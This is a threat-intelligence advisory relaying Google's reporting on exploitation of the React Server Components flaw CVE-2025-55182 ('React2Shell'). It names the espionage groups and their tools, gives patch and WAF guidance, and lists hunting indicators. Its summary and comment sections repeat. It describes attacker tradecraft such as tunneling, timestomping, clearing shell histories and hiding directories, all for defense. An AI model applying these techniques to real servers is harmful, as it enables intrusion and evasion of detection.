Update: Google Links More Chinese Hacking Groups to React2shell Attacks
Summary:
On December 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability in React Server Components, tracked as CVE-2025-55182 (informally "React2Shell"), was publicly disclosed. With a maximum CVSS score of 10.0, the flaw allows an attacker to compromise a server via a single malformed HTTP request that targets the React "Flight" protocol. Since disclosure, GTIG has observed an immediate and diverse wave of exploitation across numerous regions. This unauthenticated remote code execution vulnerability affects versions 19.0 through 19.2.0 of critical packages, including react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Because these packages are fundamental to the Next.js framework, the attack surface is vast, encompassing modern web applications across nearly every industry.
Google Threat Intelligence Group (GTIG) has documented a rapid transition from public disclosure to active weaponization by multiple high-tier threat actors. China-nexus espionage groups have been the most prolific, utilizing the flaw to deploy a suite of specialized tools:
Security Officer Comments:
The React2Shell event represents a "perfect storm" for threat actors: a critical-impact vulnerability in a ubiquitous technology stack that can be exploited with a single, unauthenticated HTTP request. The Iranian involvement is particularly significant, as it shows the vulnerability is being leveraged for both intelligence collection and more disruptive or experimental operations, such as testing blockchain-based C2 infrastructure. A major concern for defenders is the variety of valid payload formats; there is no single "signature" for the exploit request, making it harder for standard WAF rules to achieve 100% coverage. Furthermore, the discovery of follow-on vulnerabilities (CVE-2025-55183 and CVE-2025-55184) suggests that the initial patch cycle was incomplete. The analyst team notes that the targeting of cloud service providers likely points toward a strategic interest in the supply chains and data repositories of tech-heavy enterprises. The use of masqueraded filenames and hidden directories demonstrates a high level of operational security intended to defeat basic endpoint monitoring.
Suggested Corrections:
Organizations utilizing React or Next.js should take the following actions immediately:
Link(s):
https://cloud.google.com/blog/topic...at-actors-exploit-react2shell-cve-2025-55182/
On December 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability in React Server Components, tracked as CVE-2025-55182 (informally "React2Shell"), was publicly disclosed. With a maximum CVSS score of 10.0, the flaw allows an attacker to compromise a server via a single malformed HTTP request that targets the React "Flight" protocol. Since disclosure, GTIG has observed an immediate and diverse wave of exploitation across numerous regions. This unauthenticated remote code execution vulnerability affects versions 19.0 through 19.2.0 of critical packages, including react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Because these packages are fundamental to the Next.js framework, the attack surface is vast, encompassing modern web applications across nearly every industry.
Google Threat Intelligence Group (GTIG) has documented a rapid transition from public disclosure to active weaponization by multiple high-tier threat actors. China-nexus espionage groups have been the most prolific, utilizing the flaw to deploy a suite of specialized tools:
- UNC6600: Was observed deploying the MINOCAT tunneler, which uses a custom "NSS" wrapper and the Fast Reverse Proxy (FRP) client to bypass network defenses.
- UNC6586: Leveraged the SNOWLIGHT downloader (a component of the VSHELL backdoor) to establish persistence and pull further payloads from C2 infrastructure.
- UNC6603: Targeted cloud infrastructure in the APAC region with HISONIC, a Go-based implant that evades detection by using legitimate cloud services like Cloudflare Pages for its configuration.
- UNC6595: Focused on international Virtual Private Servers (VPS), deploying ANGRYREBEL.LINUX while employing anti-forensics techniques such as timestomping and clearing shell histories.
Security Officer Comments:
The React2Shell event represents a "perfect storm" for threat actors: a critical-impact vulnerability in a ubiquitous technology stack that can be exploited with a single, unauthenticated HTTP request. The Iranian involvement is particularly significant, as it shows the vulnerability is being leveraged for both intelligence collection and more disruptive or experimental operations, such as testing blockchain-based C2 infrastructure. A major concern for defenders is the variety of valid payload formats; there is no single "signature" for the exploit request, making it harder for standard WAF rules to achieve 100% coverage. Furthermore, the discovery of follow-on vulnerabilities (CVE-2025-55183 and CVE-2025-55184) suggests that the initial patch cycle was incomplete. The analyst team notes that the targeting of cloud service providers likely points toward a strategic interest in the supply chains and data repositories of tech-heavy enterprises. The use of masqueraded filenames and hidden directories demonstrates a high level of operational security intended to defeat basic endpoint monitoring.
Suggested Corrections:
Organizations utilizing React or Next.js should take the following actions immediately:
- Patch Immediately:
- To prevent remote code execution due to CVE-2025-55182, patch vulnerable React Server Components to at least 19.0.1, 19.1.2, or 19.2.1, depending on your vulnerable version. Patching to 19.2.2 or 19.2.3 will also prevent the potential for remote code execution.
- To prevent the information disclosure impacts due to CVE-2025-55183, patch vulnerable React Server Components to at least 19.2.2.
- To prevent DoS impacts due to CVE-2025-55184 and CVE-2025-67779, patch vulnerable React Server Components to 19.2.3. The 19.2.2 patch was found to be insufficient in preventing DoS impacts.
- Deploy WAF Rules: Google has rolled out a Cloud Armor web application firewall (WAF) rule designed to detect and block exploitation attempts related to this vulnerability. We recommend deploying this rule as a temporary mitigation while your vulnerability management program patches and verifies all vulnerable instances.
- Audit Dependencies: Determine if vulnerable React Server Components are included as a dependency in other applications within your environment.
- Monitor Network Traffic: Review logs for outbound connections to the indicators of compromise (IOCs) listed below, particularly wget or cURL commands initiated by web server processes.
- Hunt for Compromise: Look for the creation of hidden directories like $HOME/.systemd-utils, the unauthorized termination of processes such as ntpclient, and the injection of malicious execution logic into shell configuration files like $HOME/.bashrc.
Link(s):
https://cloud.google.com/blog/topic...at-actors-exploit-react2shell-cve-2025-55182/